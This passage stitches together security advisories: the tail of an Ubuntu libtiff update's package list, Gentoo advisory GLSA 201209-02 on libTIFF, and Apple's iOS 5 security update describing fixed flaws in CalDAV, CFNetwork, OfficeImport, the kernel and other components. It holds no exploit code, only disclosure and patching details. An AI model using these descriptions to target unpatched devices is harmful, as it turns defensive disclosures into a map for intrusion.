      Size/MD5:   232588 71573f111b56ed24c2bb95e70cf24950
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_i386.deb
      Size/MD5:   125002 9127f1c5991d7bebf346d7996aa05549
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_i386.deb
      Size/MD5:     6446 8535ecbdf277f311afe69e053e7027eb
    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_i386.deb
      Size/MD5:    11292 21192b1ec3a90204f70ac7e715f6ef94
    

    armel architecture (ARM Architecture):

    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_armel.deb
      Size/MD5:   182752 27e8c1ba005bb913056725f27afed10b
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_armel.deb
      Size/MD5:   233860 7bb2dfcf30084a32cfda47150de12820
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_armel.deb
      Size/MD5:   124716 5bf3991de9df681e72aeb2b9cb0157e3
    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_armel.deb
      Size/MD5:     5966 f7269719e2c4b9f44abb54ea640452b9
    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_armel.deb
      Size/MD5:    11160 213b7115f391a62a039e86bd2aed21e3
    

    lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_lpia.deb
      Size/MD5:   177048 6f228aae0027ce228001ab1e03c1420f
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_lpia.deb
      Size/MD5:   234412 2be52c2f11d51dc60ebd6358921ed539
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_lpia.deb
      Size/MD5:   126608 5b98943322e5546def050c29f0137c51
    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_lpia.deb
      Size/MD5:     6312 9dfcffd32f1aa8e42e6e5f94c8171333
    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_lpia.deb
      Size/MD5:    11340 69f92d56438e597d2733cca9fe192e09
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_powerpc.deb
      Size/MD5:   191484 3af0b1c5f8e037c97831d2321c144069
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_powerpc.deb
      Size/MD5:   256554 94513c2b20ec5e2206d5b5476ac4b6e1
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_powerpc.deb
      Size/MD5:   137434 0dd8d58ca4136b26395ec9619352cbf4
    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_powerpc.deb
      Size/MD5:     6724 752b5398be235d406db9b0070c8b4bcc
    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_powerpc.deb
      Size/MD5:    12080 857d09fbe80934ec33149da04cf5b4fe
    

    sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.8.2-13ubuntu0.5_sparc.deb
      Size/MD5:   184288 a83a8a638af348c50d3bb64a2c0490e4
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.8.2-13ubuntu0.5_sparc.deb
      Size/MD5:   237164 9a5c6358c6c65dfc8e5154f79c5937a1
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.8.2-13ubuntu0.5_sparc.deb
      Size/MD5:   125062 2e70ed4b0b98f15d9b6d4d1aa2c223fe
    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.8.2-13ubuntu0.5_sparc.deb
      Size/MD5:     6096 e374e39bdeb2b16f8944713dc6b59ec2
    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.8.2-13ubuntu0.5_sparc.deb
      Size/MD5:    12036 3bd0ece44e01a49c32decff3d318bcc3
    

    Updated packages for Ubuntu 10.04 LTS:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.2-2ubuntu0.5.diff.gz
      Size/MD5:    20142 b939eddaecc09a223f750ddc9ec300a7
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.2-2ubuntu0.5.dsc
      Size/MD5:     1974 0ab3539d8af96ca2ca23c1d74d79e8c6
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.2.orig.tar.gz
      Size/MD5:  1419742 93e56e421679c591de7552db13384cb8
    

    Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-doc_3.9.2-2ubuntu0.5_all.deb
      Size/MD5:   359126 ddf2cb68732e7fd96ea2078ce0ad4742
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.5_amd64.deb
      Size/MD5:   250490 975aec44c621ff1e524a7d0c344c461d
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.5_amd64.deb
      Size/MD5:   269922 24ffd793f4f4cab1c419281358f95b06
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.5_amd64.deb
      Size/MD5:   149244 8de4b36f57fd254339472d92d58df436
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.5_amd64.deb
      Size/MD5:     6384 dd647e2d96b24485c9a3d512568a33e8
    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.5_amd64.deb
      Size/MD5:    12028 f312a06be417327ccaab3bc83fce43ee
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.5_i386.deb
      Size/MD5:   234120 b80a26f6acbf41fc2835dea7be97d332
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.5_i386.deb
      Size/MD5:   246962 2aced2d3476f07034714c32581451fca
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.5_i386.deb
      Size/MD5:   136750 9e662029ab9932f9bb5cf551c9a25c70
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.5_i386.deb
      Size/MD5:     6486 588d1bff01cbec45eefbfb25864b48c7
    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.5_i386.deb
      Size/MD5:    11282 028b976bcc83292a2a436961a26cff1b
    

    armel architecture (ARM Architecture):

    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.5_armel.deb
      Size/MD5:   237816 b1bb7396d24ca82d5a72012e7f5902df
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.5_armel.deb
      Size/MD5:   238800 82ec468a735c037f758424ee05ab0eda
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.5_armel.deb
      Size/MD5:   129636 b6277537fd8ca0a7258d156b8185fc6c
    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.5_armel.deb
      Size/MD5:     5980 5ee322e0d78f7f440501872a91e78c98
    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.5_armel.deb
      Size/MD5:    11300 c0120b282e1fa3c9922b9218a1d86271
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.5_powerpc.deb
      Size/MD5:   253514 208b8a67298bb8435b790579c2369258
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.5_powerpc.deb
      Size/MD5:   275256 4ccb314e621e464c06a709fbd7632384
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.5_powerpc.deb
      Size/MD5:   150724 4787f755ef29dd7198699c9456ca5fd0
    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.5_powerpc.deb
      Size/MD5:     6770 759c330d4a755d3d217ca8afef8cb191
    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.5_powerpc.deb
      Size/MD5:    12092 86dd9f88b6d3f4e3f7ee0c3f98ce4448
    

    sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.2-2ubuntu0.5_sparc.deb
      Size/MD5:   248776 0e081f6795686de636fdb537d0da0af3
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.2-2ubuntu0.5_sparc.deb
      Size/MD5:   257346 b1cb2500a7b1ada561852e12546279a4
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.2-2ubuntu0.5_sparc.deb
      Size/MD5:   143484 b24ccd56b9eee79c062d8a1e13e65326
    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.2-2ubuntu0.5_sparc.deb
      Size/MD5:     6226 28e807e1ae69640a7e0a35ea79b8913a
    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.2-2ubuntu0.5_sparc.deb
      Size/MD5:    11922 1acad867116630bb02cf53831f49fb91
    

    Updated packages for Ubuntu 10.10:

    Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.4-2ubuntu0.2.debian.tar.gz
      Size/MD5:    18124 6b91f60b7bc92c8f0710f4088c1f38f3
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.4-2ubuntu0.2.dsc
      Size/MD5:     1991 020c2a94b61792b09f6d01752f2c7f5d
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/tiff_3.9.4.orig.tar.gz
      Size/MD5:  1436968 2006c1bdd12644dbf02956955175afd6
    

    Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-doc_3.9.4-2ubuntu0.2_all.deb
      Size/MD5:   342928 4d7df4c971ba92ab11d738820853fcc4
    

    amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.9.4-2ubuntu0.2_amd64.deb
      Size/MD5:   248246 dd83a166330ad6268952b8e49f075012
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.9.4-2ubuntu0.2_amd64.deb
      Size/MD5:   270788 73525f6754327725fd2e93fe1fc0e4fb
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.4-2ubuntu0.2_amd64.deb
      Size/MD5:   149490 2da1a59a5a933e822256d2b6d89454c6
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.9.4-2ubuntu0.2_amd64.deb
      Size/MD5:     6310 b566e3ac1e893179519b2596798ad492
    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.9.4-2ubuntu0.2_amd64.deb
      Size/MD5:    11806 a523fb6ef9ac518e5869fdc9bd72d937
    

    i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff-tools_3.9.4-2ubuntu0.2_i386.deb
      Size/MD5:   230148 a676650de4cfea04a7bfd000de0da151
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4-dev_3.9.4-2ubuntu0.2_i386.deb
      Size/MD5:   247138 95194c2ea2ab0ca87e6b8867dae07385
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiff4_3.9.4-2ubuntu0.2_i386.deb
      Size/MD5:   136668 f0931de0028f3538f92ef2547cde7bba
    http://security.ubuntu.com/ubuntu/pool/main/t/tiff/libtiffxx0c2_3.9.4-2ubuntu0.2_i386.deb
      Size/MD5:     6424 ad458d476aa6df65bfaec35f5cba9c0b
    http://security.ubuntu.com/ubuntu/pool/universe/t/tiff/libtiff-opengl_3.9.4-2ubuntu0.2_i386.deb
      Size/MD5:    11144 efd76c12cc9f9df3ba719e8f073a6bfa
    

    armel architecture (ARM Architecture):

    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.4-2ubuntu0.2_armel.deb
      Size/MD5:   256880 6aedba603449a04715b504caac95ed22
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.4-2ubuntu0.2_armel.deb
      Size/MD5:   271424 0587dc26b90416181bb71f0ee0acbed3
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.4-2ubuntu0.2_armel.deb
      Size/MD5:   151800 0a97a3959787ce6e4d4a60db21f4bd19
    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.4-2ubuntu0.2_armel.deb
      Size/MD5:     5844 6efde8a677921feabc6dd5156181d72a
    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.4-2ubuntu0.2_armel.deb
      Size/MD5:    11228 9e354f5270bc717488682dfc4712e74a
    

    powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/t/tiff/libtiff-tools_3.9.4-2ubuntu0.2_powerpc.deb
      Size/MD5:   250366 6fa58ac5fb03e3b6866499f53cb3e79d
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4-dev_3.9.4-2ubuntu0.2_powerpc.deb
      Size/MD5:   275860 d4f92d8330e793d8056e4bc5c180fba9
    http://ports.ubuntu.com/pool/main/t/tiff/libtiff4_3.9.4-2ubuntu0.2_powerpc.deb
      Size/MD5:   150712 c47116bbde1de23b39bd86ce6733e033
    http://ports.ubuntu.com/pool/main/t/tiff/libtiffxx0c2_3.9.4-2ubuntu0.2_powerpc.deb
      Size/MD5:     6702 d9524527cbcbd6b38cb782d73adbdc3b
    http://ports.ubuntu.com/pool/universe/t/tiff/libtiff-opengl_3.9.4-2ubuntu0.2_powerpc.deb
      Size/MD5:    11962 a31983d4e49adaa4fa0321c16105bae3
    

    . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201209-02


                                            http://security.gentoo.org/
    

    Severity: Normal Title: libTIFF: Multiple vulnerabilities Date: September 23, 2012 Bugs: #307001, #324885, #357271, #359871, #371308, #410931, #422673, #427166 ID: 201209-02


    Synopsis

    Multiple vulnerabilities in libTIFF could result in execution of arbitrary code or Denial of Service.

    Background

    libTIFF provides support for reading and manipulating TIFF (Tagged Image File Format) images.

    Affected packages

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
    

    1 media-libs/tiff < 4.0.2-r1 *>= 3.9.5-r2 >= 4.0.2-r1

    Description

    Multiple vulnerabilities have been discovered in libTIFF. Please review the CVE identifiers referenced below for details.

    Workaround

    There is no known workaround at this time.

    Resolution

    All libTIFF 4.0 users should upgrade to the latest version:

    # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/tiff-4.0.2-r1"

    All libTIFF 3.9 users should upgrade to the latest version:

    # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/tiff-3.9.5-r2"

    References

    [ 1 ] CVE-2009-2347 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2347 [ 2 ] CVE-2009-5022 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-5022 [ 3 ] CVE-2010-1411 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1411 [ 4 ] CVE-2010-2065 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2065 [ 5 ] CVE-2010-2067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2067 [ 6 ] CVE-2010-2233 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2233 [ 7 ] CVE-2010-2443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2443 [ 8 ] CVE-2010-2481 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2481 [ 9 ] CVE-2010-2482 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2482 [ 10 ] CVE-2010-2483 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2483 [ 11 ] CVE-2010-2595 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2595 [ 12 ] CVE-2010-2596 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2596 [ 13 ] CVE-2010-2597 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2597 [ 14 ] CVE-2010-2630 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2630 [ 15 ] CVE-2010-2631 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2631 [ 16 ] CVE-2010-3087 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3087 [ 17 ] CVE-2010-4665 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4665 [ 18 ] CVE-2011-0192 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0192 [ 19 ] CVE-2011-0192 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0192 [ 20 ] CVE-2011-1167 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1167 [ 21 ] CVE-2011-1167 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1167 [ 22 ] CVE-2012-1173 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1173 [ 23 ] CVE-2012-2088 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2088 [ 24 ] CVE-2012-2113 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2113 [ 25 ] CVE-2012-3401 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3401

    Availability

    This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

    http://security.gentoo.org/glsa/glsa-201209-02.xml

    Concerns?

    Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us.

    License

    Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

    The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

    http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    APPLE-SA-2011-10-12-1 iOS 5 Software Update

    iOS 5 Software Update is now available and addresses the following:

    CalDAV Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: An attacker with a privileged network position may intercept user credentials or other sensitive information from a CalDAV calendar server Description: CalDAV did not check that the SSL certificate presented by the server was trusted. CVE-ID CVE-2011-3253 : Leszek Tasiemski of nSense

    Calendar Available for: iOS 4.2.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 4.2.0 through 4.3.5 for iPod touch (3rd generation) and later, iOS 4.2.0 through 4.3.5 for iPad Impact: Viewing a maliciously crafted calendar invitation may inject script in the local domain Description: A script injection issue existed in Calendar's handling of invitation notes. This issue is addressed through improved escaping of special characters in invitation notes. This issues does not affect devices prior to iOS 4.2.0. CVE-ID CVE-2011-3254 : Rick Deacon

    CFNetwork Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: User's AppleID password may be logged to a local file Description: A user's AppleID password and username were logged to a file that was readable by applications on the system. This is resolved by no longer logging these credentials. CVE-ID CVE-2011-3255 : Peter Quade of qdevelop

    CFNetwork Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Visiting a maliciously crafted website may lead to the disclosure of sensitive information Description: An issue existed in CFNetwork's handling of HTTP cookies. When accessing a maliciously crafted HTTP or HTTPS URL, CFNetwork could incorrectly send the cookies for a domain to a server outside that domain. CVE-ID CVE-2011-3246 : Erling Ellingsen of Facebook

    CoreFoundation Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Viewing a maliciously crafted website or e-mail message may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in CoreFoundation's handling of string tokenization. CVE-ID CVE-2011-0259 : Apple

    CoreGraphics Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Viewing a document containing a maliciously crafted font may lead to arbitrary code execution Description: Multiple memory corruption existed in freetype, the most serious of which may lead to arbitrary code execution when processing a maliciously crafted font. CVE-ID CVE-2011-3256 : Apple

    CoreMedia Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Visiting a maliciously crafted website may lead to the disclosure of video data from another site Description: A cross-origin issue existed in CoreMedia's handling of cross-site redirects. This issue is addressed through improved origin tracking. CVE-ID CVE-2011-0187 : Nirankush Panchbhai and Microsoft Vulnerability Research (MSVR)

    Data Access Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: An exchange mail cookie management issue could incorrectly cause data synchronization across different accounts Description: When multiple mail exchange accounts are configured which connect to the same server, a session could potentially receive a valid cookie corresponding to a different account. This issue is addressed by ensuring that cookies are separated across different accounts. CVE-ID CVE-2011-3257 : Bob Sielken of IBM

    Data Security Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: An attacker with a privileged network position may intercept user credentials or other sensitive information Description: Fraudulent certificates were issued by multiple certificate authorities operated by DigiNotar. This issue is addressed by removing DigiNotar from the list of trusted root certificates, from the list of Extended Validation (EV) certificate authorities, and by configuring default system trust settings so that DigiNotar's certificates, including those issued by other authorities, are not trusted.

    Data Security Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Support for X.509 certificates with MD5 hashes may expose users to spoofing and information disclosure as attacks improve Description: Certificates signed using the MD5 hash algorithm were accepted by iOS. This algorithm has known cryptographic weaknesses. Further research or a misconfigured certificate authority could have allowed the creation of X.509 certificates with attacker controlled values that would have been trusted by the system. This would have exposed X.509 based protocols to spoofing, man in the middle attacks, and information disclosure. This update disables support for an X.509 certificate with an MD5 hash for any use other than as a trusted root certificate. CVE-ID CVE-2011-3427

    Data Security Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: An attacker could decrypt part of a SSL connection Description: Only the SSLv3 and TLS 1.0 versions of SSL were supported. These versions are subject to a protocol weakness when using block ciphers. A man-in-the-middle attacker could have injected invalid data, causing the connection to close but revealing some information about the previous data. If the same connection was attempted repeatedly the attacker may eventually have been able to decrypt the data being sent, such as a password. This issue is addressed by adding support for TLS 1.2. CVE-ID CVE-2011-3389

    Home screen Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Switching between applications may lead to the disclosure of sensitive application information Description: When switching between applications with the four- finger app switching gesture, the display could have revealed the previous application state. This issue is addressed by ensuring that the system properly calls the applicationWillResignActive: method when transitioning between applications. CVE-ID CVE-2011-3431 : Abe White of Hedonic Software Inc. CVE-ID CVE-2011-0241 : Cyril CATTIAUX of Tessi Technologies

    International Components for Unicode Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Applications that use ICU may be vulnerable to an unexpected application termination or arbitrary code execution Description: A buffer overflow issue existed in ICU's generation of collation keys for long strings of mostly uppercase letters. CVE-ID CVE-2011-0206 : David Bienvenu of Mozilla

    Kernel Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: A remote attacker may cause a device reset Description: The kernel failed to promptly reclaim memory from incomplete TCP connections. An attacker with the ability to connect to a listening service on an iOS device could exhaust system resources. CVE-ID CVE-2011-3259 : Wouter van der Veer of Topicus I&I, and Josh Enders

    Kernel Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: A local user may be able to cause a system reset Description: A null dereference issue existed in the handling of IPV6 socket options. CVE-ID CVE-2011-1132 : Thomas Clement of Intego

    Keyboards Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: A user may be able to determine information about the last character of a password Description: The keyboard used to type the last character of a password was briefly displayed the next time the keyboard was used. CVE-ID CVE-2011-3245 : Paul Mousdicas

    libxml Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: A one-byte heap buffer overflow existed in libxml's handling of XML data. CVE-ID CVE-2011-0216 : Billy Rios of the Google Security Team

    OfficeImport Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Viewing a maliciously crafted Word file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in OfficeImport's handling of Microsoft Word documents. CVE-ID CVE-2011-3260 : Tobias Klein working with Verisign iDefense Labs

    OfficeImport Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Viewing a maliciously crafted Excel file may lead to an unexpected application termination or arbitrary code execution Description: A double free issue existed in OfficeImport's handling of Excel files. CVE-ID CVE-2011-3261 : Tobias Klein of www.trapkit.de

    OfficeImport Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Downloading a maliciously crafted Microsoft Office file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in OfficeImport's handling of Microsoft Office files. CVE-ID CVE-2011-0208 : Tobias Klein working with iDefense VCP

    OfficeImport Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Downloading a maliciously crafted Excel file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in OfficeImport's handling of Excel files. CVE-ID CVE-2011-0184 : Tobias Klein working with iDefense VCP

    Safari Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Opening maliciously crafted files on certain websites may lead to a cross-site scripting attack Description: iOS did not support the 'attachment' value for the HTTP Content-Disposition header. This header is used by many websites to serve files that were uploaded to the site by a third-party, such as attachments in web-based e-mail applications. Any script in files served with this header value would run as if the file had been served inline, with full access to other resources on the origin server. This issue is addressed by loading attachments in an isolated security origin with no access to resources on other sites. CVE-ID CVE-2011-3426 : Christian Matthies working with iDefense VCP, Yoshinori Oota from Business Architects Inc working with JP/CERT

    Settings Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: An attacker with physical access to a device may be able to recover the restrictions passcode Description: The parental restrictions functionality enforces UI restrictions. Configuring parental restrictions is protected by a passcode, which was previously stored in plaintext on disk. This issue is addressed by securely storing the parental restrictions passcode in the system keychain. CVE-ID CVE-2011-3429 : an anonymous reporter

    Settings Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch (3rd generation) and later, iOS 3.2 through 4.3.5 for iPad Impact: Misleading UI Description: Configurations and settings applied via configuration profiles did not appear to function properly under any non-English language. Settings could be improperly displayed as a result. This issue is addressed by fixing a localization error. CVE-ID CVE-2011-3430 : Florian Kreitmaier of Siemens CERT

